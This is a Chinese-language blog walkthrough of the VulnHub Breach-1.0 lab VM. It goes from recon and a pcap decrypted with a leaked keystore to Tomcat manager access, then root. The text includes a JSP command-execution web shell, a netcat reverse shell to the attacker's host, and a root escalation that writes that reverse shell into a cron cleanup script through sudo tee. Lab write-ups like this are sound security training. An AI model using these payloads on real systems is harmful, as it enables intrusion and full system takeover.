VulnHub 实战靶场Breach-1.0

相比于CTF题目,Vulnhub的靶场更贴近于实际一些,而且更加综合考察了知识。在这里记录以下打这个靶场的过程和心得。

测试环境

  • Kali linux IP:192.168.110.128

  • Breach 1.0 IP:192.168.110.140

    均通过NAT模式连主机

信息搜集

先扫描开放端口,发现开了一大堆。
VulnHub 实战靶场Breach-1.0
直接查看80端口Web服务

VulnHub 实战靶场Breach-1.0

查看页面源码有一串字符

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

VulnHub 实战靶场Breach-1.0

得到一串意义不明的东西
pgibbons:damnitfeel$goodtobeagang$ta

点击图片有跳转,挨个点击,发现了一个impress cms

VulnHub 实战靶场Breach-1.0

那看到cms第一反应就是去找现成的漏洞,有跨站脚本执行和本地文件包含,但都是在admin的情况下才可以执行, 这个时候我们不妨试试之前解出的那串字符,作为账号密码。

发现可以成功,进入之后查看发现有个收件箱,里面三封邮件得到了一个关键信息,192.168.110.140/.keystore,是一个SSL证书,访问链接即可下载。

但是线索到这里暂时断了,但是网上找到一个漏洞信息

漏洞信息
ImpressCMS是一款内容管理系统。
ImpressCMS存在跨站脚本漏洞,可通过PATH_INFO传递给otifications.php, modules/system/admin/images/browser.phpmodules/content/admin/content.php脚本的输入注入WEB脚本或HTML,可获得敏感信息或劫持用户会话。

虽然经一系列尝试无果,但是在访问modules/content/admin/content.php的时候,由于没有权限跳转到了这个页面

VulnHub 实战靶场Breach-1.0

content下面有个链接

VulnHub 实战靶场Breach-1.0
是一个流量包,那之前拿到的SSL证书就能用到了。

关键信息:http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'.

查看流量包

打开流量包,直接查看没有什么有用信息

VulnHub 实战靶场Breach-1.0

导入SSL证书,因为是tomcat服务所以端口号选择8443,

VulnHub 实战靶场Breach-1.0

说明我们拿到的证书格式不对,需要PKCS12格式的证书。我们使用keytool查看信息,密码是tomcat

VulnHub 实战靶场Breach-1.0

根据提示信息操作

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

VulnHub 实战靶场Breach-1.0

现在格式正确了

重新导入,多了一些http包

VulnHub 实战靶场Breach-1.0

我们筛选一下http包

VulnHub 实战靶场Breach-1.0

发现在请求一个网页,但是第一次没有成功,比较两个数据包,发现多了这一行请求。

VulnHub 实战靶场Breach-1.0

我们也尝试访问这个页面

https://192.168.110.140:8443/_M@nag3Me/html

但是一直访问不成功,尝试抓包

才发现是觉得不安全被拦截了,抓包访问的时候会让你输入账号密码

VulnHub 实战靶场Breach-1.0

tomcat:Tt\5D8F(#!*u=G)4m7zB

使用流量包中发现的账号密码登录

VulnHub 实战靶场Breach-1.0

进入后台

我们进入了一个tomcat的后台界面,发现一个文件上传点,需要上传war包。

VulnHub 实战靶场Breach-1.0

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

打包成war上传之后访问,传参

VulnHub 实战靶场Breach-1.0

成功,但是测试的时候发现隔一会上传的马会被删除,应该是后台有一个定时清除的脚本,因此我们弹一个shell出来

GetShell以及提权

Kali使用nc -lnvp 8888监听

发送nc -v 192.168.110.128 8888 -e /bin/bash, 成功之后使用python -c 'import pty;pty.spawn("/bin/sh")'进入交互式界面

VulnHub 实战靶场Breach-1.0

home目录下两个用户以及/etc/passwd

VulnHub 实战靶场Breach-1.0

发现在/var/www/5446/目录下有两个奇怪的php文件

VulnHub 实战靶场Breach-1.0

VulnHub 实战靶场Breach-1.0

发现是数据库的账号和密码,我们连接数据库看一看

VulnHub 实战靶场Breach-1.0

VulnHub 实战靶场Breach-1.0

找到了milton用户的密码hash

VulnHub 实战靶场Breach-1.0

破解得密码thelaststraw

登录milton用户,但是发现很遗憾,这个用户没有sudo权限

VulnHub 实战靶场Breach-1.0

查看.bash_history

VulnHub 实战靶场Breach-1.0

看样子我们需要得到blumbergh用户的权限。我们再看milton家目录下的那张图片,放到/var/www/html/images/目录下

VulnHub 实战靶场Breach-1.0

检查这张图片,并没有什么玄机。

VulnHub 实战靶场Breach-1.0

再查看images下的图片权限

VulnHub 实战靶场Breach-1.0

发现有两张图片的权限与其他不同,查看

VulnHub 实战靶场Breach-1.0

发现bill.png下面有个commentcoffeestains,结果这个就是blumbergh用户的密码,就挺离谱的。

登录blumbergh用户,查看.bash_history

VulnHub 实战靶场Breach-1.0

查看一下tidyup.sh

VulnHub 实战靶场Breach-1.0

就是这个指令之前删除了我们的shell

但是这个脚本的权限是755, 现有权限并不能更改

VulnHub 实战靶场Breach-1.0

但是我们发现现在这个用户有一个权限,就是可以使用tee指令

VulnHub 实战靶场Breach-1.0

因此就有了修改的方式

echo nc -v 192.168.110.128 8888 -e /bin/bash | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

VulnHub 实战靶场Breach-1.0

因为这个脚本是root用户的权限,因此我们通过这个方式反弹出来的shell就是root权限。设置监听之后等待即可。

VulnHub 实战靶场Breach-1.0

VulnHub 实战靶场Breach-1.0

至此,成功提权到root

上一篇:用JFreeChart 生成报表


下一篇:【VulnHub FALL】 任意文件读取